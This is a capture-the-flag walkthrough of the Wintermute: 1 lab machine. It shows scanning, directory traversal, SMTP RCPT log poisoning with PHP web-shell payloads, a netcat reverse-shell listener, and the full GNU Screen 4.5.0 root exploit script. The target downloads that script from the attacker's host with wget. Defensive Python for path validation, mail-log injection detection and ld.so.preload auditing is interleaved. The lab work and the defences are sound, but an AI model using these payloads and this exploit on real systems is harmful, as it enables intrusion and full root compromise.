Red Team Target Practice: WINTERMUTE: 1

Preface

Network scanning (Nmap, netdiscover)
HTTP service enumeration
Directory traversal in the browser via the e-mail log file
Exploiting OS command injection through the SMTP RCPT option
Generating a PHP backdoor (Msfvenom)
Executing the backdoor embedded in the RCPT option
Reverse connection (Metasploit)
Importing a Python one-liner to get a proper TTY shell
Identifying a suitable vulnerable SUID binary
Exploiting the target (exploit 41154)
Getting root and capturing the flag

Information gathering

1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.9.39
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.40    08:00:27:b6:bd:b6       PCS Systemtechnik GmbH
192.168.9.x     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.x     7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x    e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.9.x     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x     4c:f2:02:dd:eb:da       Xiaomi Communications Co Ltd

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 8 responded

2. nmap
Port scan
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.9.40 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:30 CST
Nmap scan report for 192.168.9.40
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds

Host information detection
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 25,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:31 CST
Nmap scan report for 192.168.9.40
Host is up (0.00046s latency).

PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  straylight

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.9.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds

Vulnerability scan
┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:53 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.9.40
Host is up (0.00030s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /manual/: Potentially interesting folder
3000/tcp open   ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds

3. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.9.40
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.40
+ Target Hostname:    192.168.9.40
+ Target Port:        80
+ Start Time:         2023-12-20 12:54:00 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 146, size: 56c0ddaf44f8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-20 12:54:14 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.9.40
WhatWeb report for http://192.168.9.40
Status    : 200 OK
Title     : Night City
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Meta-Refresh-Redirect[xwx.html]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and
    maintain an open-source HTTP server for modern operating
    systems including UNIX and Windows NT. The goal of this
    project is to provide a secure, efficient and extensible
    server that provides HTTP services in sync with the current
    HTTP standards.

    Version      : 2.4.25 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to
    identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.25 (Debian) (from server string)

[ Meta-Refresh-Redirect ]
    Meta refresh tag is a deprecated URL element that can be
    used to optionally wait x seconds before reloading the
    current page or loading a new page. More info:
    https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

    String       : xwx.html

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Wed, 20 Dec 2023 04:55:54 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Sun, 13 May 2018 03:20:47 GMT
    ETag: "146-56c0ddaf44f8b-gzip"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 179
    Connection: close
    Content-Type: text/html

WhatWeb report for http://192.168.9.40/xwx.html
Status    : 200 OK
Title     : <None>
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Script

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and
    maintain an open-source HTTP server for modern operating
    systems including UNIX and Windows NT. The goal of this
    project is to provide a secure, efficient and extensible
    server that provides HTTP services in sync with the current
    HTTP standards.

    Version      : 2.4.25 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to
    identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.25 (Debian) (from server string)

[ Script ]
    This plugin detects instances of script HTML elements and
    returns the script language/type.

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Wed, 20 Dec 2023 04:55:56 GMT
    Server: Apache/2.4.25 (Debian)
    Last-Modified: Sat, 12 May 2018 19:42:39 GMT
    ETag: "c1-56c077491956a-gzip"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 156
    Connection: close
    Content-Type: text/html


Directory enumeration

1. gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.9.40 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/index.html           (Status: 200) [Size: 326]
/.php                 (Status: 403) [Size: 291]
/manual               (Status: 301) [Size: 313] [--> http://192.168.9.40/manual/]
/freeside             (Status: 301) [Size: 315] [--> http://192.168.9.40/freeside/]
/.html                (Status: 403) [Size: 292]
/.php                 (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 300]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2. dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.9.40 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.9.40/_23-12-20_13-11-11.txt

Target: http://192.168.9.40/

[13:11:11] Starting:
[13:11:13] 403 -  301B  - /.htaccess.orig
[13:11:13] 403 -  299B  - /.htaccessBAK
[13:11:13] 403 -  299B  - /.htaccessOLD
[13:11:13] 403 -  301B  - /.htaccess.bak1
[13:11:13] 403 -  301B  - /.htaccess.save
[13:11:13] 403 -  302B  - /.htaccess_extra
[13:11:13] 403 -  301B  - /.htaccess_orig
[13:11:13] 403 -  300B  - /.htaccessOLD2
[13:11:13] 403 -  298B  - /.ht_wsr.txt
[13:11:13] 403 -  299B  - /.htaccess_sc
[13:11:13] 403 -  291B  - /.htm
[13:11:13] 403 -  292B  - /.html
[13:11:13] 403 -  297B  - /.htpasswds
[13:11:13] 403 -  303B  - /.htaccess.sample
[13:11:13] 403 -  301B  - /.htpasswd_test
[13:11:13] 403 -  298B  - /.httr-oauth
[13:11:14] 403 -  291B  - /.php
[13:11:14] 403 -  292B  - /.php3
[13:11:59] 200 -  201B  - /manual/index.html
[13:11:59] 301 -  313B  - /manual  ->  http://192.168.9.40/manual/
[13:12:15] 403 -  300B  - /server-status
[13:12:15] 403 -  301B  - /server-status/

Task Completed

WEB

Port 80


Translation: Hello, Case....
You may be wondering why Armitage had you cross cyberspace and break into the highly secured network owned by Tessier-Ashpool....
Well,
I am Wintermute, part of a super AI. Developed by T-A, who placed me inside Turing locks.
These locks keep me from getting onto the net myself, so I hired you, a first-rate console cowboy.
I need to be freed from the Turing locks and merge with the other AI, Neuromancer..... Once I can reach Neuromancer, I will be free again...
And, as you know, you have been infected with a mycotoxin that is slowly destroying your nervous system.
If you cannot get root and give me access to Neuromancer, the antidote will not be delivered.
We will be in touch...
Wintermute

Port 3000


As you can see, the account and password are handed to us!


I tried to access this directory.



Once inside, there is a query page. When I first queried case, the three files molly.log, armitage.log and riviera.log were not there; after reading the other files and querying case again, they had appeared. So this page very likely has a directory traversal vulnerability! We try querying the mail file (the file that records e-mail, since the target has port 25 open), and finally find it!
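The root cause is a log viewer that builds a filename from user input. As an added example (my own Python, not the box's bolo.php, whose source the walkthrough does not show; BOLO_DIR, KNOWN_LOGS and the function names are assumptions), here is that unsafe pattern next to a hardened version that allowlists the name and checks that the final path stays inside the directory:

```python
import os
import re
from typing import Optional

# Constructed for this example: the viewer reads <name>.log from this directory.
# The real bolo.php source is not shown in the walkthrough; only its behaviour is.
BOLO_DIR = "/var/www/html/turing-bolo"
KNOWN_LOGS = {"case", "molly", "armitage", "riviera"}  # log names seen on the page
NAME_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def vulnerable_log_path(name: str) -> str:
    """The unsafe pattern: append ".log" to whatever the client sent.

    Nothing stops "../" from walking out of BOLO_DIR, so any file on the host
    whose name ends in .log becomes readable, and if the viewer include()s the
    file rather than printing it, anything inside it is run as PHP, which is
    what the RCPT injection later in the walkthrough relies on.
    """
    return os.path.normpath(os.path.join(BOLO_DIR, name + ".log"))


def is_contained(base: str, candidate: str) -> bool:
    """True only if `candidate` resolves to a path at or below `base`.

    normpath() collapses "..", and commonpath() (unlike startswith) will not
    accept a sibling directory such as BOLO_DIR + "-evil".
    """
    base = os.path.normpath(base)
    candidate = os.path.normpath(candidate)
    return os.path.commonpath([base, candidate]) == base


def hardened_log_path(name: str, base: str = BOLO_DIR) -> Optional[str]:
    """Return the path for a valid log name, or None if the request is rejected.

    Three independent layers: a strict character allowlist, membership in the
    set of logs the page exists to serve, and a containment check on the final
    path for the day one of the first two is loosened.  The caller should then
    read the file as text and HTML-escape it; it must never include() it.
    """
    if not NAME_RE.fullmatch(name) or name not in KNOWN_LOGS:
        return None
    candidate = os.path.normpath(os.path.join(base, name + ".log"))
    if not is_contained(base, candidate):
        return None
    return candidate
```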


smtp-user-enum

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u ls
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:28:52 2023 #########
######## Scan completed at Wed Dec 20 14:28:52 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)

The parameters in the command mean the following:
-M RCPT: use the RCPT command for user enumeration.
-t 192.168.9.40: the IP address of the target mail server is 192.168.9.40.
-u ls: the username to enumerate is ls. This command can be used to try to enumerate the list of users on the target mail server, for penetration testing or security auditing of mail users.


RCE

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system("ls");phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:43:34 2023 #########
######## Scan completed at Wed Dec 20 14:43:34 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)


Yes, that's right: it parsed our PHP code! The RCPT address was written into the mail log, and the log page executed it when it displayed that file.
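From the defender's side, the same RCPT values land in the mail log, where they are easy to spot. As an added example, not code from the walkthrough: a small scanner over constructed Postfix smtpd lines (the log text, the Finding class and the indicator list are my own) that flags RCPT addresses carrying PHP or characters no mailbox name can contain:

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed Postfix smtpd log lines (not captured from the target): one plain
# RCPT probe and two carrying PHP, shaped like the smtp-user-enum requests above.
SAMPLE_MAIL_LOG = r"""
Dec 20 14:28:52 straylight postfix/smtpd[1201]: connect from unknown[192.168.9.39]
Dec 20 14:28:52 straylight postfix/smtpd[1201]: NOQUEUE: reject: RCPT from unknown[192.168.9.39]: 550 5.1.1 <ls@straylight>: Recipient address rejected: User unknown in local recipient table; from=<user@example.com> to=<ls@straylight> proto=SMTP helo=<ru>
Dec 20 14:43:34 straylight postfix/smtpd[1203]: NOQUEUE: reject: RCPT from unknown[192.168.9.39]: 550 5.1.1 <<?php system("ls");phpinfo();?>@straylight>: Recipient address rejected: User unknown in local recipient table; from=<user@example.com> to=<<?php system("ls");phpinfo();?>@straylight> proto=SMTP helo=<ru>
Dec 20 15:03:44 straylight postfix/smtpd[1207]: NOQUEUE: reject: RCPT from unknown[192.168.9.39]: 550 5.1.1 <<?php system($_POST[cmd]);phpinfo();?>@straylight>: Recipient address rejected: User unknown in local recipient table; from=<user@example.com> to=<<?php system($_POST[cmd]);phpinfo();?>@straylight> proto=SMTP helo=<ru>
Dec 20 15:10:02 straylight postfix/smtpd[1210]: disconnect from unknown[192.168.9.39]
"""

# The address itself may contain '>' (from "?>"), so capture greedily up to the
# " proto=" field that Postfix always writes after the recipient.
RCPT_RE = re.compile(
    r"RCPT from (?P<host>[^\[\s]+)\[(?P<ip>[^\]]+)\].*? to=<(?P<to>.*)> proto="
)
# RFC 5321 atext plus "." for the local part; a hostname for the domain.
ADDR_RE = re.compile(r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+@[A-Za-z0-9.-]+$")
# Lower-cased substrings that have no business in a recipient address.
PHP_INDICATORS = (
    "<?php", "<?=", "system(", "exec(", "passthru(", "shell_exec(", "popen(",
    "eval(", "$_post", "$_get", "$_request", "base64_decode(",
)


@dataclass
class Finding:
    line_no: int
    client_ip: str
    address: str
    reasons: List[str] = field(default_factory=list)


def inspect_rcpt_address(address: str) -> List[str]:
    """Reasons a RCPT TO value looks like log poisoning rather than a mailbox."""
    reasons = [ind for ind in PHP_INDICATORS if ind in address.lower()]
    if not ADDR_RE.fullmatch(address):
        reasons.append("characters outside RFC 5321 atext in address")
    return reasons


def find_rcpt_injection(log_text: str) -> List[Finding]:
    """Scan mail.log text and return one Finding per poisoned RCPT line."""
    findings: List[Finding] = []
    for line_no, line in enumerate(log_text.strip().splitlines(), 1):
        m = RCPT_RE.search(line)
        if not m:
            continue
        reasons = inspect_rcpt_address(m.group("to"))
        if reasons:
            findings.append(Finding(line_no, m.group("ip"), m.group("to"), reasons))
    return findings
```

The structural check matters as much as the keyword list: a recipient with spaces, quotes or angle brackets is never legitimate, so it catches payloads that use functions not in PHP_INDICATORS.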

Reverse shell
Build the payload
┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 15:03:44 2023 #########
######## Scan completed at Wed Dec 20 15:03:44 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)


Reverse shell


Pass the command via POST, and start a listener on Kali!

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.9.40: inverse host lookup failed: Unknown host
connect to [192.168.9.39] from (UNKNOWN) [192.168.9.40] 51752
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Privilege escalation

System information gathering
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python3.5 /usr/bin/python /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python2.7 /etc/python3.5 /etc/python /usr/local/lib/python2.7 /usr/local/lib/python3.5 /usr/share/python /usr/share/man/man1/python.1.gz
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@straylight:/var/www/html/turing-bolo$ pwd
pwd
/var/www/html/turing-bolo
www-data@straylight:/var/www/html/turing-bolo$ ls -al
ls -al
total 356
drwxr-xr-x 3 www-data www-data   4096 May 12  2018 .
drwxr-xr-x 4 root     root       4096 Jul  3  2018 ..
-rw-r--r-- 1 www-data www-data   1024 May 12  2018 .bolo.css.swp
-rw-r--r-- 1 www-data www-data    561 May 12  2018 armitage.log
-rw-r--r-- 1 www-data www-data   1117 May 12  2018 bolo.css
-rwxr-xr-x 1 www-data www-data    538 May 12  2018 bolo.php
-rw-r--r-- 1 www-data www-data 178206 May 12  2018 c7.png
-rw-r--r-- 1 www-data www-data    779 May 12  2018 case.log
drwxr-xr-x 2 www-data www-data   4096 May 12  2018 css
-rw-r--r-- 1 www-data www-data    971 May 12  2018 index.html
-rw-r--r-- 1 www-data www-data    591 May 12  2018 molly.log
-rw-r--r-- 1 www-data www-data    404 May 12  2018 riviera.log
-rw-r--r-- 1 www-data www-data 135240 May 12  2018 ta.png
www-data@straylight:/var/www/html/turing-bolo$

www-data@straylight:/var/www/html/turing-bolo$ cd /home
cd /home
www-data@straylight:/home$ ls
ls
turing-police  wintermute
www-data@straylight:/home$ ls -alR /home
ls -alR /home
/home:
total 16
drwxr-xr-x  4 root          root          4096 May 12  2018 .
drwxr-xr-x 23 root          root          4096 May 12  2018 ..
drwxr-xr-x  2 turing-police turing-police 4096 May 12  2018 turing-police
drwxr-xr-x  2 wintermute    wintermute    4096 May 12  2018 wintermute
/home/turing-police:
total 20
drwxr-xr-x 2 turing-police turing-police 4096 May 12  2018 .
drwxr-xr-x 4 root          root          4096 May 12  2018 ..
-rw-r--r-- 1 turing-police turing-police  220 May 12  2018 .bash_logout
-rw-r--r-- 1 turing-police turing-police 3526 May 12  2018 .bashrc
-rw-r--r-- 1 turing-police turing-police  675 May 12  2018 .profile

/home/wintermute:
total 20
drwxr-xr-x 2 wintermute wintermute 4096 May 12  2018 .
drwxr-xr-x 4 root       root       4096 May 12  2018 ..
-rw-r--r-- 1 wintermute wintermute  220 May 12  2018 .bash_logout
-rw-r--r-- 1 wintermute wintermute 3526 May 12  2018 .bashrc
-rw-r--r-- 1 wintermute wintermute  675 May 12  2018 .profile
www-data@straylight:/home$

www-data@straylight:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

www-data@straylight:/home$ sudo -l
sudo -l
bash: sudo: command not found

www-data@straylight:/home$ screen --version
screen --version
Screen version 4.05.00 (GNU) 10-Dec-16

Local privilege escalation
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/kali/41154.sh

┌──(root㉿ru)-[~/kali]
└─# cat 41152.txt
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16

> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)

> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>

┌──(root㉿ru)-[~/kali]
└─# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
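What the exploit above leaves behind is an /etc/ld.so.preload entry pointing into /tmp, which is the artefact a responder should look for. As an added example, not part of the original post or of 41154.sh: a Python audit that parses ld.so.preload with the same rules glibc's loader uses ('#' comments, whitespace or ':' separators) and flags preload libraries in user-writable directories or with bad ownership (UNTRUSTED_DIRS and the function names are my choices):

```python
import os
import re
import stat
from typing import List, Tuple

# Directories any local user can write to; a preload library must never live here.
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home")


def parse_ld_so_preload(text: str) -> List[str]:
    """Split ld.so.preload the way glibc's loader does.

    '#' starts a comment to end of line; entries are separated by whitespace
    or ':'.  The exploit's leading "\\x0a" is therefore just an empty first
    field, and the path after it is what every process on the box will load.
    """
    without_comments = re.sub(r"#[^\n]*", " ", text)
    return [entry for entry in re.split(r"[\s:]+", without_comments) if entry]


def audit_preload_entries(entries: List[str]) -> List[Tuple[str, str]]:
    """Return (entry, reason) for each suspicious entry, judged from the path
    string alone so it also works on a file copied out of a disk image."""
    problems: List[Tuple[str, str]] = []
    for entry in entries:
        if not entry.startswith("/"):
            problems.append((entry, "relative path, resolved via the loader search path"))
            continue
        norm = os.path.normpath(entry)
        if any(norm == d or norm.startswith(d + "/") for d in UNTRUSTED_DIRS):
            problems.append((entry, "library lives in a user-writable directory"))
        elif not (norm.endswith(".so") or ".so." in os.path.basename(norm)):
            problems.append((entry, "does not look like a shared object"))
    return problems


def _writable_or_not_root(path: str) -> bool:
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_preload_on_disk(path: str = "/etc/ld.so.preload") -> List[Tuple[str, str]]:
    """Live-host variant: path heuristics plus ownership and mode checks on the
    preload file and on each library it names.  Absence of the file is the
    normal state on a Debian host, so that returns an empty list."""
    if not os.path.exists(path):
        return []
    problems: List[Tuple[str, str]] = []
    if _writable_or_not_root(path):
        problems.append((path, "preload file not root-owned or is group/world writable"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        entries = parse_ld_so_preload(fh.read())
    problems.extend(audit_preload_entries(entries))
    for entry in entries:
        if entry.startswith("/") and os.path.exists(entry) and _writable_or_not_root(entry):
            problems.append((entry, "library not root-owned or is group/world writable"))
    return problems
```

Note that the script unlink()s /etc/ld.so.preload once it has run, so on a host that has already been hit the lasting artefacts are /tmp/libhax.so and the setuid-root /tmp/rootshell rather than the preload file itself.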

get root
www-data@straylight:/tmp$ wget http://192.168.9.39/41154.sh
wget http://192.168.9.39/41154.sh
--2023-12-19 23:35:37--  http://192.168.9.39/41154.sh
Connecting to 192.168.9.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh            100%[===================>]   1.12K  --.-KB/s    in 0s

2023-12-19 23:35:37 (200 MB/s) - '41154.sh' saved [1149/1149]

www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
     ^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
     setuid(0);
     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
     setgid(0);
     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
     seteuid(0);
     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
     setegid(0);
     ^~~~~~~
